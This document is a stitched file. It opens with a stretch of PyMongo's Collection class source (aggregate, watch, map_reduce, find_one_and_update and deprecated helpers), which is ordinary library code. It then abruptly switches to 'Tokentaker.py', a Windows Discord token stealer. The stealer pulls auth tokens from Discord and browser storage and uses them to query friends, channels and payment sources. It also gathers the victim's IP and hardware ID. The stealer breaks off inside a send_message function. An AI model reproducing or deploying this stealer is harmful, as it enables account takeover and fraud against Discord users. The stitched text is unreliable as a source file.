on MongoDB 3.4 and above.
- `useCursor` (bool): Deprecated. Will be removed in PyMongo 4.0.
The :meth:`aggregate` method obeys the :attr:`read_preference` of this
:class:`Collection`. Please note that using the ``$out`` pipeline stage
requires a read preference of
:attr:`~pymongo.read_preferences.ReadPreference.PRIMARY` (the default).
The server will raise an error if the ``$out`` pipeline stage is used
with any other read preference.
.. note:: This method does not support the 'explain' option. Please
use :meth:`~pymongo.database.Database.command` instead. An
example is included in the :ref:`aggregate-examples` documentation.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
:Parameters:
- `pipeline`: a list of aggregation pipeline stages
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
:Returns:
A :class:`~pymongo.command_cursor.CommandCursor` over the result
set.
.. versionchanged:: 3.6
Added the `session` parameter. Added the `maxAwaitTimeMS` option.
Deprecated the `useCursor` option.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4. Support the `collation` option.
.. versionchanged:: 3.0
The :meth:`aggregate` method always returns a CommandCursor. The
pipeline argument must be a list.
.. versionchanged:: 2.7
When the cursor option is used, return
:class:`~pymongo.command_cursor.CommandCursor` instead of
:class:`~pymongo.cursor.Cursor`.
.. versionchanged:: 2.6
Added cursor support.
.. versionadded:: 2.3
.. seealso:: :doc:`/examples/aggregation`
.. _aggregate command:
https://docs.mongodb.com/manual/reference/command/aggregate
"""
with self.__database.client._tmp_session(session, close=False) as s:
return self._aggregate(pipeline,
CommandCursor,
kwargs.get('batchSize'),
session=s,
explicit_session=session is not None,
**kwargs)
def aggregate_raw_batches(self, pipeline, **kwargs):
"""Perform an aggregation and retrieve batches of raw BSON.
Similar to the :meth:`aggregate` method but returns a
:class:`~pymongo.cursor.RawBatchCursor`.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
>>> import bson
>>> cursor = db.test.aggregate_raw_batches([
... {'$project': {'x': {'$multiply': [2, '$x']}}}])
>>> for batch in cursor:
... print(bson.decode_all(batch))
.. note:: aggregate_raw_batches does not support sessions.
.. versionadded:: 3.6
"""
# OP_MSG with document stream returns is required to support
# sessions.
if "session" in kwargs:
raise ConfigurationError(
"aggregate_raw_batches does not support sessions")
return self._aggregate(pipeline, RawBatchCommandCursor, 0,
None, False, **kwargs)
def watch(self, pipeline=None, full_document='default', resume_after=None,
max_await_time_ms=None, batch_size=None, collation=None,
start_at_operation_time=None, session=None):
"""Watch changes on this collection.
Performs an aggregation with an implicit initial ``$changeStream``
stage and returns a
:class:`~pymongo.change_stream.CollectionChangeStream` cursor which
iterates over changes on this collection.
Introduced in MongoDB 3.6.
.. code-block:: python
with db.collection.watch() as stream:
for change in stream:
print(change)
The :class:`~pymongo.change_stream.CollectionChangeStream` iterable
blocks until the next change document is returned or an error is
raised. If the
:meth:`~pymongo.change_stream.CollectionChangeStream.next` method
encounters a network error when retrieving a batch from the server,
it will automatically attempt to recreate the cursor such that no
change events are missed. Any error encountered during the resume
attempt indicates there may be an outage and will be raised.
.. code-block:: python
try:
with db.collection.watch(
[{'$match': {'operationType': 'insert'}}]) as stream:
for insert_change in stream:
print(insert_change)
except pymongo.errors.PyMongoError:
# The ChangeStream encountered an unrecoverable error or the
# resume attempt failed to recreate the cursor.
logging.error('...')
For a precise description of the resume process see the
`change streams specification`_.
.. note:: Using this helper method is preferred to directly calling
:meth:`~pymongo.collection.Collection.aggregate` with a
``$changeStream`` stage, for the purpose of supporting
resumability.
.. warning:: This Collection's :attr:`read_concern` must be
``ReadConcern("majority")`` in order to use the ``$changeStream``
stage.
:Parameters:
- `pipeline` (optional): A list of aggregation pipeline stages to
append to an initial ``$changeStream`` stage. Not all
pipeline stages are valid after a ``$changeStream`` stage, see the
MongoDB documentation on change streams for the supported stages.
- `full_document` (optional): The fullDocument to pass as an option
to the ``$changeStream`` stage. Allowed values: 'default',
'updateLookup'. Defaults to 'default'.
When set to 'updateLookup', the change notification for partial
updates will include both a delta describing the changes to the
document, as well as a copy of the entire document that was
changed from some time after the change occurred.
- `resume_after` (optional): The logical starting point for this
change stream.
- `max_await_time_ms` (optional): The maximum time in milliseconds
for the server to wait for changes before responding to a getMore
operation.
- `batch_size` (optional): The maximum number of documents to return
per batch.
- `collation` (optional): The :class:`~pymongo.collation.Collation`
to use for the aggregation.
- `start_at_operation_time` (optional): If provided, the resulting
change stream will only return changes that occurred at or after
the specified :class:`~bson.timestamp.Timestamp`. Requires
MongoDB >= 4.0.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
A :class:`~pymongo.change_stream.CollectionChangeStream` cursor.
.. versionchanged:: 3.7
Added the ``start_at_operation_time`` parameter.
.. versionadded:: 3.6
.. mongodoc:: changeStreams
.. _change streams specification:
https://github.com/mongodb/specifications/blob/master/source/change-streams/change-streams.rst
"""
return CollectionChangeStream(
self, pipeline, full_document, resume_after, max_await_time_ms,
batch_size, collation, start_at_operation_time, session
)
def group(self, key, condition, initial, reduce, finalize=None, **kwargs):
"""Perform a query similar to an SQL *group by* operation.
**DEPRECATED** - The group command was deprecated in MongoDB 3.4. The
:meth:`~group` method is deprecated and will be removed in PyMongo 4.0.
Use :meth:`~aggregate` with the `$group` stage or :meth:`~map_reduce`
instead.
.. versionchanged:: 3.5
Deprecated the group method.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 2.2
Removed deprecated argument: command
"""
warnings.warn("The group method is deprecated and will be removed in "
"PyMongo 4.0. Use the aggregate method with the $group "
"stage or the map_reduce method instead.",
DeprecationWarning, stacklevel=2)
group = {}
if isinstance(key, string_type):
group["$keyf"] = Code(key)
elif key is not None:
group = {"key": helpers._fields_list_to_dict(key, "key")}
group["ns"] = self.__name
group["$reduce"] = Code(reduce)
group["cond"] = condition
group["initial"] = initial
if finalize is not None:
group["finalize"] = Code(finalize)
cmd = SON([("group", group)])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
with self._socket_for_reads(session=None) as (sock_info, slave_ok):
return self._command(sock_info, cmd, slave_ok,
collation=collation)["retval"]
def rename(self, new_name, session=None, **kwargs):
"""Rename this collection.
If operating in auth mode, client must be authorized as an
admin to perform this operation. Raises :class:`TypeError` if
`new_name` is not an instance of :class:`basestring`
(:class:`str` in python 3). Raises :class:`~pymongo.errors.InvalidName`
if `new_name` is not a valid collection name.
:Parameters:
- `new_name`: new name for this collection
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional arguments to the rename command
may be passed as keyword arguments to this helper method
(i.e. ``dropTarget=True``)
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation when using
MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
"""
if not isinstance(new_name, string_type):
raise TypeError("new_name must be an "
"instance of %s" % (string_type.__name__,))
if not new_name or ".." in new_name:
raise InvalidName("collection names cannot be empty")
if new_name[0] == "." or new_name[-1] == ".":
raise InvalidName("collecion names must not start or end with '.'")
if "$" in new_name and not new_name.startswith("oplog.$main"):
raise InvalidName("collection names must not contain '$'")
new_name = "%s.%s" % (self.__database.name, new_name)
cmd = SON([("renameCollection", self.__full_name), ("to", new_name)])
cmd.update(kwargs)
write_concern = self._write_concern_for_cmd(cmd, session)
with self._socket_for_writes() as sock_info:
with self.__database.client._tmp_session(session) as s:
return sock_info.command(
'admin', cmd,
write_concern=write_concern,
parse_write_concern_error=True,
session=s, client=self.__database.client)
def distinct(self, key, filter=None, session=None, **kwargs):
"""Get a list of distinct values for `key` among all documents
in this collection.
Raises :class:`TypeError` if `key` is not an instance of
:class:`basestring` (:class:`str` in python 3).
All optional distinct parameters should be passed as keyword arguments
to this method. Valid options include:
- `maxTimeMS` (int): The maximum amount of time to allow the count
command to run, in milliseconds.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
The :meth:`distinct` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `key`: name of the field for which we want to get the distinct
values
- `filter` (optional): A query document that specifies the documents
from which to retrieve the distinct values.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): See list of options above.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Support the `collation` option.
"""
if not isinstance(key, string_type):
raise TypeError("key must be an "
"instance of %s" % (string_type.__name__,))
cmd = SON([("distinct", self.__name),
("key", key)])
if filter is not None:
if "query" in kwargs:
raise ConfigurationError("can't pass both filter and query")
kwargs["query"] = filter
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
with self._socket_for_reads(session) as (sock_info, slave_ok):
return self._command(sock_info, cmd, slave_ok,
read_concern=self.read_concern,
collation=collation, session=session)["values"]
def map_reduce(self, map, reduce, out, full_response=False, session=None,
**kwargs):
"""Perform a map/reduce operation on this collection.
If `full_response` is ``False`` (default) returns a
:class:`~pymongo.collection.Collection` instance containing
the results of the operation. Otherwise, returns the full
response from the server to the `map reduce command`_.
:Parameters:
- `map`: map function (as a JavaScript string)
- `reduce`: reduce function (as a JavaScript string)
- `out`: output collection name or `out object` (dict). See
the `map reduce command`_ documentation for available options.
Note: `out` options are order sensitive. :class:`~bson.son.SON`
can be used to specify multiple options.
e.g. SON([('replace', <collection name>), ('db', <database name>)])
- `full_response` (optional): if ``True``, return full response to
this command - otherwise just return the result collection
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional arguments to the
`map reduce command`_ may be passed as keyword arguments to this
helper method, e.g.::
>>> db.test.map_reduce(map, reduce, "myresults", limit=2)
.. note:: The :meth:`map_reduce` method does **not** obey the
:attr:`read_preference` of this :class:`Collection`. To run
mapReduce on a secondary use the :meth:`inline_map_reduce` method
instead.
.. note:: The :attr:`~pymongo.collection.Collection.write_concern` of
this collection is automatically applied to this operation (if the
output is not inline) when using MongoDB >= 3.4.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Apply this collection's write concern automatically to this operation
when connected to MongoDB >= 3.4.
.. seealso:: :doc:`/examples/aggregation`
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 2.2
Removed deprecated arguments: merge_output and reduce_output
.. _map reduce command: http://docs.mongodb.org/manual/reference/command/mapReduce/
.. mongodoc:: mapreduce
"""
if not isinstance(out, (string_type, abc.Mapping)):
raise TypeError("'out' must be an instance of "
"%s or a mapping" % (string_type.__name__,))
cmd = SON([("mapreduce", self.__name),
("map", map),
("reduce", reduce),
("out", out)])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
inline = 'inline' in cmd['out']
sock_ctx, read_pref = self._socket_for_primary_reads(session)
with sock_ctx as (sock_info, slave_ok):
if (sock_info.max_wire_version >= 4 and 'readConcern' not in cmd and
inline):
read_concern = self.read_concern
else:
read_concern = None
if 'writeConcern' not in cmd and not inline:
write_concern = self._write_concern_for(session)
else:
write_concern = None
response = self._command(
sock_info, cmd, slave_ok, read_pref,
read_concern=read_concern,
write_concern=write_concern,
collation=collation, session=session)
if full_response or not response.get('result'):
return response
elif isinstance(response['result'], dict):
dbase = response['result']['db']
coll = response['result']['collection']
return self.__database.client[dbase][coll]
else:
return self.__database[response["result"]]
def inline_map_reduce(self, map, reduce, full_response=False, session=None,
**kwargs):
"""Perform an inline map/reduce operation on this collection.
Perform the map/reduce operation on the server in RAM. A result
collection is not created. The result set is returned as a list
of documents.
If `full_response` is ``False`` (default) returns the
result documents in a list. Otherwise, returns the full
response from the server to the `map reduce command`_.
The :meth:`inline_map_reduce` method obeys the :attr:`read_preference`
of this :class:`Collection`.
:Parameters:
- `map`: map function (as a JavaScript string)
- `reduce`: reduce function (as a JavaScript string)
- `full_response` (optional): if ``True``, return full response to
this command - otherwise just return the result collection
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional arguments to the
`map reduce command`_ may be passed as keyword arguments to this
helper method, e.g.::
>>> db.test.inline_map_reduce(map, reduce, limit=2)
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
"""
cmd = SON([("mapreduce", self.__name),
("map", map),
("reduce", reduce),
("out", {"inline": 1})])
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd.update(kwargs)
with self._socket_for_reads(session) as (sock_info, slave_ok):
if sock_info.max_wire_version >= 4 and 'readConcern' not in cmd:
res = self._command(sock_info, cmd, slave_ok,
read_concern=self.read_concern,
collation=collation, session=session)
else:
res = self._command(sock_info, cmd, slave_ok,
collation=collation, session=session)
if full_response:
return res
else:
return res.get("results")
def _write_concern_for_cmd(self, cmd, session):
raw_wc = cmd.get('writeConcern')
if raw_wc is not None:
return WriteConcern(**raw_wc)
else:
return self._write_concern_for(session)
def __find_and_modify(self, filter, projection, sort, upsert=None,
return_document=ReturnDocument.BEFORE,
array_filters=None, session=None, **kwargs):
"""Internal findAndModify helper."""
common.validate_is_mapping("filter", filter)
if not isinstance(return_document, bool):
raise ValueError("return_document must be "
"ReturnDocument.BEFORE or ReturnDocument.AFTER")
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd = SON([("findAndModify", self.__name),
("query", filter),
("new", return_document)])
cmd.update(kwargs)
if projection is not None:
cmd["fields"] = helpers._fields_list_to_dict(projection,
"projection")
if sort is not None:
cmd["sort"] = helpers._index_document(sort)
if upsert is not None:
common.validate_boolean("upsert", upsert)
cmd["upsert"] = upsert
write_concern = self._write_concern_for_cmd(cmd, session)
def _find_and_modify(session, sock_info, retryable_write):
if array_filters is not None:
if sock_info.max_wire_version < 6:
raise ConfigurationError(
'Must be connected to MongoDB 3.6+ to use '
'arrayFilters.')
if not write_concern.acknowledged:
raise ConfigurationError(
'arrayFilters is unsupported for unacknowledged '
'writes.')
cmd["arrayFilters"] = array_filters
if (sock_info.max_wire_version >= 4 and
not write_concern.is_server_default):
cmd['writeConcern'] = write_concern.document
out = self._command(sock_info, cmd,
read_preference=ReadPreference.PRIMARY,
write_concern=write_concern,
allowable_errors=[_NO_OBJ_ERROR],
collation=collation, session=session,
retryable_write=retryable_write)
_check_write_command_response(out)
return out.get("value")
return self.__database.client._retryable_write(
write_concern.acknowledged, _find_and_modify, session)
def find_one_and_delete(self, filter,
projection=None, sort=None, session=None, **kwargs):
"""Finds a single document and deletes it, returning the document.
>>> db.test.count_documents({'x': 1})
2
>>> db.test.find_one_and_delete({'x': 1})
{u'x': 1, u'_id': ObjectId('54f4e12bfba5220aa4d6dee8')}
>>> db.test.count_documents({'x': 1})
1
If multiple documents match *filter*, a *sort* can be applied.
>>> for doc in db.test.find({'x': 1}):
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> db.test.find_one_and_delete(
... {'x': 1}, sort=[('_id', pymongo.DESCENDING)])
{u'x': 1, u'_id': 2}
The *projection* option can be used to limit the fields returned.
>>> db.test.find_one_and_delete({'x': 1}, projection={'_id': False})
{u'x': 1}
:Parameters:
- `filter`: A query that matches the document to delete.
- `projection` (optional): a list of field names that should be
returned in the result document or a mapping specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a mapping to exclude fields from
the result (e.g. projection={'_id': False}).
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for the query. If multiple documents
match the query, they are sorted and the first is deleted.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional command arguments can be passed
as keyword arguments (for example maxTimeMS can be used with
recent server versions).
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Respects write concern.
.. warning:: Starting in PyMongo 3.2, this command uses the
:class:`~pymongo.write_concern.WriteConcern` of this
:class:`~pymongo.collection.Collection` when connected to MongoDB >=
3.2. Note that using an elevated write concern with this command may
be slower compared to using the default write concern.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionadded:: 3.0
"""
kwargs['remove'] = True
return self.__find_and_modify(filter, projection, sort,
session=session, **kwargs)
def find_one_and_replace(self, filter, replacement,
projection=None, sort=None, upsert=False,
return_document=ReturnDocument.BEFORE,
session=None, **kwargs):
"""Finds a single document and replaces it, returning either the
original or the replaced document.
The :meth:`find_one_and_replace` method differs from
:meth:`find_one_and_update` by replacing the document matched by
*filter*, rather than modifying the existing document.
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> db.test.find_one_and_replace({'x': 1}, {'y': 1})
{u'x': 1, u'_id': 0}
>>> for doc in db.test.find({}):
... print(doc)
...
{u'y': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
:Parameters:
- `filter`: A query that matches the document to replace.
- `replacement`: The replacement document.
- `projection` (optional): A list of field names that should be
returned in the result document or a mapping specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a mapping to exclude fields from
the result (e.g. projection={'_id': False}).
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for the query. If multiple documents
match the query, they are sorted and the first is replaced.
- `upsert` (optional): When ``True``, inserts a new document if no
document matches the query. Defaults to ``False``.
- `return_document`: If
:attr:`ReturnDocument.BEFORE` (the default),
returns the original document before it was replaced, or ``None``
if no document matches. If
:attr:`ReturnDocument.AFTER`, returns the replaced
or inserted document.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional command arguments can be passed
as keyword arguments (for example maxTimeMS can be used with
recent server versions).
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Respects write concern.
.. warning:: Starting in PyMongo 3.2, this command uses the
:class:`~pymongo.write_concern.WriteConcern` of this
:class:`~pymongo.collection.Collection` when connected to MongoDB >=
3.2. Note that using an elevated write concern with this command may
be slower compared to using the default write concern.
.. versionadded:: 3.0
"""
common.validate_ok_for_replace(replacement)
kwargs['update'] = replacement
return self.__find_and_modify(filter, projection,
sort, upsert, return_document,
session=session, **kwargs)
def find_one_and_update(self, filter, update,
projection=None, sort=None, upsert=False,
return_document=ReturnDocument.BEFORE,
array_filters=None, session=None, **kwargs):
"""Finds a single document and updates it, returning either the
original or the updated document.
>>> db.test.find_one_and_update(
... {'_id': 665}, {'$inc': {'count': 1}, '$set': {'done': True}})
{u'_id': 665, u'done': False, u'count': 25}}
By default :meth:`find_one_and_update` returns the original version of
the document before the update was applied. To return the updated
version of the document instead, use the *return_document* option.
>>> from pymongo import ReturnDocument
>>> db.example.find_one_and_update(
... {'_id': 'userid'},
... {'$inc': {'seq': 1}},
... return_document=ReturnDocument.AFTER)
{u'_id': u'userid', u'seq': 1}
You can limit the fields returned with the *projection* option.
>>> db.example.find_one_and_update(
... {'_id': 'userid'},
... {'$inc': {'seq': 1}},
... projection={'seq': True, '_id': False},
... return_document=ReturnDocument.AFTER)
{u'seq': 2}
The *upsert* option can be used to create the document if it doesn't
already exist.
>>> db.example.delete_many({}).deleted_count
1
>>> db.example.find_one_and_update(
... {'_id': 'userid'},
... {'$inc': {'seq': 1}},
... projection={'seq': True, '_id': False},
... upsert=True,
... return_document=ReturnDocument.AFTER)
{u'seq': 1}
If multiple documents match *filter*, a *sort* can be applied.
>>> for doc in db.test.find({'done': True}):
... print(doc)
...
{u'_id': 665, u'done': True, u'result': {u'count': 26}}
{u'_id': 701, u'done': True, u'result': {u'count': 17}}
>>> db.test.find_one_and_update(
... {'done': True},
... {'$set': {'final': True}},
... sort=[('_id', pymongo.DESCENDING)])
{u'_id': 701, u'done': True, u'result': {u'count': 17}}
:Parameters:
- `filter`: A query that matches the document to update.
- `update`: The update operations to apply.
- `projection` (optional): A list of field names that should be
returned in the result document or a mapping specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a dict to exclude fields from
the result (e.g. projection={'_id': False}).
- `sort` (optional): a list of (key, direction) pairs
specifying the sort order for the query. If multiple documents
match the query, they are sorted and the first is updated.
- `upsert` (optional): When ``True``, inserts a new document if no
document matches the query. Defaults to ``False``.
- `return_document`: If
:attr:`ReturnDocument.BEFORE` (the default),
returns the original document before it was updated, or ``None``
if no document matches. If
:attr:`ReturnDocument.AFTER`, returns the updated
or inserted document.
- `array_filters` (optional): A list of filters specifying which
array elements an update should apply. Requires MongoDB 3.6+.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `**kwargs` (optional): additional command arguments can be passed
as keyword arguments (for example maxTimeMS can be used with
recent server versions).
.. versionchanged:: 3.6
Added the `array_filters` and `session` options.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Respects write concern.
.. warning:: Starting in PyMongo 3.2, this command uses the
:class:`~pymongo.write_concern.WriteConcern` of this
:class:`~pymongo.collection.Collection` when connected to MongoDB >=
3.2. Note that using an elevated write concern with this command may
be slower compared to using the default write concern.
.. versionadded:: 3.0
"""
common.validate_ok_for_update(update)
common.validate_list_or_none('array_filters', array_filters)
kwargs['update'] = update
return self.__find_and_modify(filter, projection,
sort, upsert, return_document,
array_filters, session=session, **kwargs)
def save(self, to_save, manipulate=True, check_keys=True, **kwargs):
"""Save a document in this collection.
**DEPRECATED** - Use :meth:`insert_one` or :meth:`replace_one` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("save is deprecated. Use insert_one or replace_one "
"instead", DeprecationWarning, stacklevel=2)
common.validate_is_document_type("to_save", to_save)
write_concern = None
collation = validate_collation_or_none(kwargs.pop('collation', None))
if kwargs:
write_concern = WriteConcern(**kwargs)
if not (isinstance(to_save, RawBSONDocument) or "_id" in to_save):
return self._insert(
to_save, True, check_keys, manipulate, write_concern)
else:
self._update_retryable(
{"_id": to_save["_id"]}, to_save, True,
check_keys, False, manipulate, write_concern,
collation=collation)
return to_save.get("_id")
def insert(self, doc_or_docs, manipulate=True,
check_keys=True, continue_on_error=False, **kwargs):
"""Insert a document(s) into this collection.
**DEPRECATED** - Use :meth:`insert_one` or :meth:`insert_many` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("insert is deprecated. Use insert_one or insert_many "
"instead.", DeprecationWarning, stacklevel=2)
write_concern = None
if kwargs:
write_concern = WriteConcern(**kwargs)
return self._insert(doc_or_docs, not continue_on_error,
check_keys, manipulate, write_concern)
def update(self, spec, document, upsert=False, manipulate=False,
multi=False, check_keys=True, **kwargs):
"""Update a document(s) in this collection.
**DEPRECATED** - Use :meth:`replace_one`, :meth:`update_one`, or
:meth:`update_many` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("update is deprecated. Use replace_one, update_one or "
"update_many instead.", DeprecationWarning, stacklevel=2)
common.validate_is_mapping("spec", spec)
common.validate_is_mapping("document", document)
if document:
# If a top level key begins with '$' this is a modify operation
# and we should skip key validation. It doesn't matter which key
# we check here. Passing a document with a mix of top level keys
# starting with and without a '$' is invalid and the server will
# raise an appropriate exception.
first = next(iter(document))
if first.startswith('$'):
check_keys = False
write_concern = None
collation = validate_collation_or_none(kwargs.pop('collation', None))
if kwargs:
write_concern = WriteConcern(**kwargs)
return self._update_retryable(
spec, document, upsert, check_keys, multi, manipulate,
write_concern, collation=collation)
def remove(self, spec_or_id=None, multi=True, **kwargs):
"""Remove a document(s) from this collection.
**DEPRECATED** - Use :meth:`delete_one` or :meth:`delete_many` instead.
.. versionchanged:: 3.0
Removed the `safe` parameter. Pass ``w=0`` for unacknowledged write
operations.
"""
warnings.warn("remove is deprecated. Use delete_one or delete_many "
"instead.", DeprecationWarning, stacklevel=2)
if spec_or_id is None:
spec_or_id = {}
if not isinstance(spec_or_id, abc.Mapping):
spec_or_id = {"_id": spec_or_id}
write_concern = None
collation = validate_collation_or_none(kwargs.pop('collation', None))
if kwargs:
write_concern = WriteConcern(**kwargs)
return self._delete_retryable(
spec_or_id, multi, write_concern, collation=collation)
def find_and_modify(self, query={}, update=None,
upsert=False, sort=None, full_response=False,
manipulate=False, **kwargs):
"""Update and return an object.
**DEPRECATED** - Use :meth:`find_one_and_delete`,
:meth:`find_one_and_replace`, or :meth:`find_one_and_update` instead.
"""
warnings.warn("find_and_modify is deprecated, use find_one_and_delete"
", find_one_and_replace, or find_one_and_update instead",
DeprecationWarning, stacklevel=2)
if not update and not kwargs.get('remove', None):
raise ValueError("Must either update or remove")
if update and kwargs.get('remove', None):
raise ValueError("Can't do both update and remove")
# No need to include empty args
if query:
kwargs['query'] = query
if update:
kwargs['update'] = update
if upsert:
kwargs['upsert'] = upsert
if sort:
# Accept a list of tuples to match Cursor's sort parameter.
if isinstance(sort, list):
kwargs['sort'] = helpers._index_document(sort)
# Accept OrderedDict, SON, and dict with len == 1 so we
# don't break existing code already using find_and_modify.
elif (isinstance(sort, ORDERED_TYPES) or
isinstance(sort, dict) and len(sort) == 1):
warnings.warn("Passing mapping types for `sort` is deprecated,"
" use a list of (key, direction) pairs instead",
DeprecationWarning, stacklevel=2)
kwargs['sort'] = sort
else:
raise TypeError("sort must be a list of (key, direction) "
"pairs, a dict of len 1, or an instance of "
"SON or OrderedDict")
fields = kwargs.pop("fields", None)
if fields is not None:
kwargs["fields"] = helpers._fields_list_to_dict(fields, "fields")
collation = validate_collation_or_none(kwargs.pop('collation', None))
cmd = SON([("findAndModify", self.__name)])
cmd.update(kwargs)
write_concern = self._write_concern_for_cmd(cmd, None)
def _find_and_modify(session, sock_info, retryable_write):
if (sock_info.max_wire_version >= 4 and
not write_concern.is_server_default):
cmd['writeConcern'] = write_concern.document
result = self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
allowable_errors=[_NO_OBJ_ERROR], collation=collation,
session=session, retryable_write=retryable_write)
_check_write_command_response(result)
return result
out = self.__database.client._retryable_write(
write_concern.acknowledged, _find_and_modify, None)
if not out['ok']:
if out["errmsg"] == _NO_OBJ_ERROR:
return None
else:
# Should never get here b/c of allowable_errors
raise ValueError("Unexpected Error: %s" % (out,))
if full_response:
return out
else:
document = out.get('value')
if manipulate:
document = self.__database._fix_outgoing(document, self)
return document
def __iter__(self):
return self
def __next__(self):
raise TypeError("'Collection' object is not iterable")
next = __next__
def __call__(self, *args, **kwargs):
"""This is only here so that some API misusages are easier to debug.
"""
if "." not in self.__name:
raise TypeError("'Collection' object is not callable. If you "
"meant to call the '%s' method on a 'Database' "
"object it is failing because no such method "
"exists." %
self.__name)
raise TypeError("'Collection' object is not callable. If you meant to "
"call the '%s' method on a 'Collection' object it is "
"failing because no such method exists." %
self.__name.split(".")[-1])
|
Tokentaker.py | import os
import time
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from datetime import datetime
from threading import Thread
from time import sleep
from sys import argv
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord" : ROAMING + "\\Discord",
"Discord Canary" : ROAMING + "\\discordcanary",
"Discord PTB" : ROAMING + "\\discordptb",
"Google Chrome" : LOCAL + "\\Google\\Chrome\\User Data\\Default",
"Opera" : ROAMING + "\\Opera Software\\Opera Stable",
"Brave" : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
"Yandex" : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default"
}
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def getuserdata(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())
except:
pass
def gettokens(path):
path += "\\Local Storage\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def getdeveloper():
dev = "Franco"
try:
dev = urlopen(Request("https://pastebin.com/raw/P857P8MT")).read().decode()
except:
pass
return dev
def getip():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
def getavatar(uid, aid):
url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"
try:
urlopen(Request(url))
except:
url = url[:-4]
return url
def gethwid():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]
def getfriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getheaders(token))).read().decode())
except:
pass
def getchat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def has_payment_methods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)
except:
pass
def send_message(token, chat_id, form_data):
try:
